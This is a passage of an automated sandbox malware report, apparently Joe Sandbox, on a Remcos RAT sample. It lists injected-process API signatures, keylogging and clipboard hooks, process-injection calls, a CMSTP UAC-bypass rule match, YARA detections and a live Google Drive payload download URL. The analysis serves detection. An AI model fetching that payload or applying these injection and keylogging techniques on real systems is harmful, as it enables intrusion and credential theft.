                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00054EC1
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_0004532E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_02E8928E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,21_2_02E8C388
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,21_2_02E9C322
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_02E896A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_02E99B86
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_02E8BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02ECE8F9 FindFirstFileExA,21_2_02ECE8F9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E87877 FindFirstFileW,FindNextFileW,21_2_02E87877
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,21_2_02E88847
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_02E8BD72
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_03207CD2

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAE4B8 InternetCheckConnectionA,0_2_02CAE4B8
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 142.250.181.129:443
                Source: global trafficHTTP traffic detected: GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03216676 Sleep,URLDownloadToFileW,11_2_03216676
                Source: global trafficHTTP traffic detected: GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: nft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                Source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/dow
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
                Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
                Source: nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX?
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320A2F3 SetWindowsHookExA 0000000D,0320A2DF,0000000011_2_0320A2F3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0320B749
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_032168FC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_02E968FC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0320B749
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0320A41B
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321CA73 SystemParametersInfoW,11_2_0321CA73
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9CA73 SystemParametersInfoW,21_2_02E9CA73

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8730 NtQueueApcThread,0_2_02CA8730
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA7A2C NtAllocateVirtualMemory,0_2_02CA7A2C
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02CADC8C
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02CADC04
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA7D78 NtWriteVirtualMemory,0_2_02CA7D78
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02CADD70
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02CA8D6E
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02CA8D70
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA7A2A NtAllocateVirtualMemory,0_2_02CA7A2A
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02CADBB0
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,7_2_00054823
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,7_2_0005643A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,7_2_00067460
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000564CA NtQueryInformationToken,7_2_000564CA
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00056500 NtQueryInformationToken,NtQueryInformationToken,7_2_00056500
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006A135 NtSetInformationFile,7_2_0006A135
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_0006C1FA
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,7_2_00044E3B
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,7_2_00054759
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,15_2_00054823
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,15_2_0005643A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,15_2_00067460
                Source: C:\Users\Public\alpha.pifCode function: 15_2_000564CA NtQueryInformationToken,15_2_000564CA
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00056500 NtQueryInformationToken,NtQueryInformationToken,15_2_00056500
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006A135 NtSetInformationFile,15_2_0006A135
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,15_2_0006C1FA
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,15_2_00044E3B
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,15_2_00054759
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C58730 NtQueueApcThread,19_2_02C58730
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C57A2C NtAllocateVirtualMemory,19_2_02C57A2C
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C5DD70 NtOpenFile,NtReadFile,19_2_02C5DD70
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C57D78 NtWriteVirtualMemory,19_2_02C57D78
